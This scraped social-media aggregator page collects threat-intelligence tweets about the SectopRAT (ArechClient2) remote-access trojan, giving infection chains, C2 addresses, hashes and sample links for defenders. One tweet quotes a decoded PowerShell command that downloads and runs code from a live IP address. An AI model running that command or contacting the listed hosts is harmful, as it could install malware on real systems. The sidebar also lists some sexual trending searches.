Top Tweets for #SecTopRAT
#ThreatProtection #Lumma Stealer & #SectopRAT paired in a resurfacing attack chain starting with "cracked" software, read more: https://t.co/ZJZBEyqHWm #malware

ISC Diary: #SmartApeSG campaign pushes #Remcos #RAT, #NetSupportRAT, #StealC and #SectopRAT (#ArechC https://t.co/g4XR3RCgxi

![JAMESWT_WT's tweet photo. https://t.co/3S9rtyf0bW
👇
C2 179.61.145.]140 related to #SectopRAT
Samples
https://t.co/LlMcTmXhZ5 https://t.co/9Txf467rJW](https://pbs.twimg.com/media/HD8FdIZXAAAtAMZ.jpg)
#SectopRAT via #malvertising - #RenPy #RenpyLoader
For the (un)trained eye it's becoming increasingly difficult to distinguish #malicious #ads and real downloads.
https://t.co/vSB76aqogJ
https://t.co/ZcXcIQobXV

📌 Zararlı PDF'ler, Türkiye'yi doğrudan hedef alıyor.
IoC’ler:
• c28f8fa5f0cb8c6a942b6b7f1884dcf5
• c6c3194a1f081ab7dc840cbf588e2ef4
• 176[.]65[.]132[.]6
• evgshippingline[.]com
#StealC - #Vidar - #ArechClient2 - #SectopRAT
kaynak: @kaspersky
IoC claim: @malpulse
![skocherhan's tweet photo. 36[.]255[.]98[.]59:9000/wbinjget
AS208137 Feo Prest SRL 🇹🇼
#Arechclient2 #SecTopRAT #RedlineStealer https://t.co/uHWjmuxj5P](https://pbs.twimg.com/media/G6WaEl-WcAAQjLD.png)

![skocherhan's tweet photo. 107[.]189[.]21[.]86:9000/wbinjget
AS14956 ROUTERHOSTING 🇳🇱
#Arechclient2 #SecTopRAT https://t.co/pq55gL2bvo](https://pbs.twimg.com/media/G6VbZnoW8AA1g-9.png)

Okay #FlowViz @feedly , this is cool! Tried linking the report we published from @TheDFIRReport on #SectopRat, and FlowViz smoothly created these visuals in less than 3 minutes.
https://t.co/FwosF0sgqn
3acc2336b8d45f0dae5c2cbaf8d24222
1cd150e0c173bd746fbca10440d5d1eb
48862b66199348aa375af9f88b74cdb7
705b25a484408fea27f2d8d3557407ca
83[.]222[.]191[.]98:9000/wbinjget
rinasalleh[.]com
107[.]158[.]128[.]45
polarcompany[.]org
173[.]44[.]141[.]89
teamsi[.]org
#SectopRAT #CastleRAT #TAG150
'ScannerElectr64 zip' is a #HijackLoader from India @abuse_ch
ZIP is detected but all files FUD in it.
https://t.co/VlFYP6gTh7
C2: hxxp://88.214.50(.)35:9000/wbinjget

🚨 New C2 Detected!
🔗 216[.]75[.]145[.]227
ℹ️ ASN: AS17014
ℹ️ ASN Organization: NAN
📍 Country: US
📍 City: Pittsfield
📅 2025-08-30T16:00:54
ℹ️ Type: #cnc - #c2
ℹ️ Family: #SectopRAT
#ThreatIntelligence #IoCs #Malware
#ThreatProtection Fake cracked games deliver #LummaStealer, which pulls in #SectopRAT for remote access, read more about Symantec's protection: https://t.co/0WGHdR5N7K
2025-08-15 (Friday): #LummaStealer infection leads to #SectopRAT (#ArechClient2). Details at https://t.co/V3kqDD6I37

We've observed an interesting infection chain ⛓️ in the wild, starting with #LummaStealer spread through a fake gaming website and resulting in #Latrodectus and #SectopRat 🪲🔍👀
Infection starts with the user visiting a website offering free game downloads, where they are redirected and prompted to download a password-protected zip file from mega[.]nz ⚠️
When the user executes the file, Lumma is executed in a new process, which later downloads Latrodectus and SectopRAT:
Latrodectus payload URL:
🌐 https://t.co/f26oGGGHSU
SectopRAT payload URL:
🌐 https://t.co/jIKVBRfOFL
Latrodectus config 🗜️:
CampaignID: Callisto
Direction: 3
Version: 2.2
IOCs:
📡 https://t.co/wjSG3ShXM3
📡 https://t.co/7OgTaPjzO0
Malware samples:
📄 https://t.co/YsBVuCSPGt
📄 https://t.co/jYPnh1KXbl
📄 https://t.co/KeCnyiM7eB
![abuse_ch's tweet photo. We've observed an interesting infection chain ⛓️ in the wild, starting with #LummaStealer spread through a fake gaming website and resulting in #Latrodectus and #SectopRat 🪲🔍👀
Infection starts with the user visiting a website offering free game downloads, where they are redirected and prompted to download a password-protected zip file from mega[.]nz ⚠️
When the user executes the file, Lumma is executed in a new process, which later downloads Latrodectus and SectopRAT:
Latrodectus payload URL:
🌐 https://t.co/f26oGGGHSU
SectopRAT payload URL:
🌐 https://t.co/jIKVBRfOFL
Latrodectus config 🗜️:
CampaignID: Callisto
Direction: 3
Version: 2.2
IOCs:
📡 https://t.co/wjSG3ShXM3
📡 https://t.co/7OgTaPjzO0
Malware samples:
📄 https://t.co/YsBVuCSPGt
📄 https://t.co/jYPnh1KXbl
📄 https://t.co/KeCnyiM7eB](https://pbs.twimg.com/media/GxLx-nnXIAEUg_G.jpg)
HOST-BANNER_0_HASH: `82cddf3a9bff315d8fc708e5f5f85f20`
Looks like a solid predictive indicator for #ARECHCLIENT2/#SECTOPRAT redirector infra.
CC: @500mk500, @SreekarMad, @ValidinLLC
#GHOSTPULSE

New research from #ElasticSecurityLabs uncovers a new ClickFix campaign! Learn how attackers are using GHOSTPULSE and ARECHCLIENT2 (SECTOPRAT) in multi-stage attacks to deploy RATs and steal data. Stay informed: https://t.co/ndKdRIj76P
#SHADOWLADDER dropping #SectopRAT
fc590c0f43d771f0368383e1c93e318e
TRS00004589Transaction55000_pdf.zip
github.]com/Bryceapichler/
github.]com/coleeantoo
c2
hxxp:]//45.]137.]99.]210/v10/buhm.php
@JAMESWT_WT @500mk500 @anyrun_app
https://t.co/JCUblm0Sf2
![salmanvsf's tweet photo. #SHADOWLADDER dropping #SectopRAT
fc590c0f43d771f0368383e1c93e318e
TRS00004589Transaction55000_pdf.zip
github.]com/Bryceapichler/
github.]com/coleeantoo
c2
hxxp:]//45.]137.]99.]210/v10/buhm.php
@JAMESWT_WT @500mk500 @anyrun_app
https://t.co/JCUblm0Sf2 https://t.co/I8Y4K0HcE2](https://pbs.twimg.com/media/GtjGkwzbYAAkxcs.jpg)
Threat actors are moving away from #DanaBot, citing poor performance despite its heavy promotion on cybercrime forums.
Several have already migrated to more capable tools—#SectopRAT is notably gaining traction.
Full intel in our latest CATALYST brief (subscribers only): 🔗 https://t.co/dqBNSxEbhs
#ThreatIntel #Malware

This one checks a lot of #LateralMovement TTPs. Could have been nicely blocked by #LDAPFirewall & #RPCFirewall + some #NetworkSegmentation
How #blackSuit #ransomware spread from first fake #zoom installer -> d3f@ckloader #IDAT #SectopRAT
https://t.co/nuYNOBicMp

🌟New report out today!🌟
Fake Zoom Ends in BlackSuit Ransomware
Analysis and reporting completed by @pigerlin, UC1 and @Miixxedup
Audio: Available on Spotify, Apple, YouTube and more!
https://t.co/r9hQxzPTL0
#ThreatProtection #SectopRAT #malware variant distributed under the disguise of Chrome installer, read more about Symantec's protection: https://t.co/KImo9GN3A4
Related Samples
#SectopRAT #arechclient2 92.255.85[.]36
👇
https://t.co/NMC8Co4eQj
cc @smica83 @500mk500 @spektrumdj
![JAMESWT_WT's tweet photo. Related Samples
#SectopRAT #arechclient2 92.255.85[.]36
👇
https://t.co/NMC8Co4eQj
cc @smica83 @500mk500 @spektrumdj https://t.co/LQKqhniBNm](https://pbs.twimg.com/media/GkDcV87XIAApdMC.jpg)
The Base64 string:
$New-Object Net.WebClient).DownloadString(‘http://216.238.90.145/w/koa’) | IEX
Last Seen Hashtags on Sotwe
teenagegirls()** +filter:native_video
Seen from Korea
alanyatravesti
Seen from Turkey
animalportrait
Seen from United States
yapamamdeme
Seen from United States
splatoonnsfw
Seen from United Kingdom
gaybarcelona
Seen from Turkey
ometv
Seen from United States
teacherstouchourhearts
Seen from United States
암캐
Seen from Japan
asianboy
Seen from Indonesia
Most Popular Users

Elon Musk 
@elonmusk
240.6M followers

Barack Obama 
@barackobama
119.2M followers

Donald J. Trump 
@realdonaldtrump
111.7M followers

Cristiano Ronaldo 
@cristiano
110.5M followers

Narendra Modi 
@narendramodi
107M followers

Rihanna 
@rihanna
97.6M followers

NASA 
@nasa
92.2M followers

Justin Bieber 
@justinbieber
90.9M followers

KATY PERRY 
@katyperry
87.6M followers

Taylor Swift 
@taylorswift13
81.4M followers

Lady Gaga 
@ladygaga
73M followers

Virat Kohli 
@imvkohli
69.8M followers

Kim Kardashian 
@kimkardashian
69.8M followers

YouTube 
@youtube
68.7M followers

Bill Gates 
@billgates
63.9M followers

Neymar Jr 
@neymarjr
62.5M followers

The Ellen Show
@theellenshow
62.4M followers

CNN 
@cnn
61.9M followers

X 
@x
60.8M followers

Selena Gomez 
@selenagomez
60.7M followers



![JAMESWT_WT's tweet photo. https://t.co/3S9rtyf0bW
👇
C2 179.61.145.]140 related to #SectopRAT
Samples
https://t.co/LlMcTmXhZ5 https://t.co/9Txf467rJW](https://pbs.twimg.com/media/HD8FNqqWwAAk_mF.png)
![JAMESWT_WT's tweet photo. https://t.co/3S9rtyf0bW
👇
C2 179.61.145.]140 related to #SectopRAT
Samples
https://t.co/LlMcTmXhZ5 https://t.co/9Txf467rJW](https://pbs.twimg.com/media/HD8E0Q_aQAAiHQY.jpg)

















![salmanvsf's tweet photo. #SHADOWLADDER dropping #SectopRAT
fc590c0f43d771f0368383e1c93e318e
TRS00004589Transaction55000_pdf.zip
github.]com/Bryceapichler/
github.]com/coleeantoo
c2
hxxp:]//45.]137.]99.]210/v10/buhm.php
@JAMESWT_WT @500mk500 @anyrun_app
https://t.co/JCUblm0Sf2 https://t.co/I8Y4K0HcE2](https://pbs.twimg.com/media/GtjGFlVaAAAdqx5.jpg)





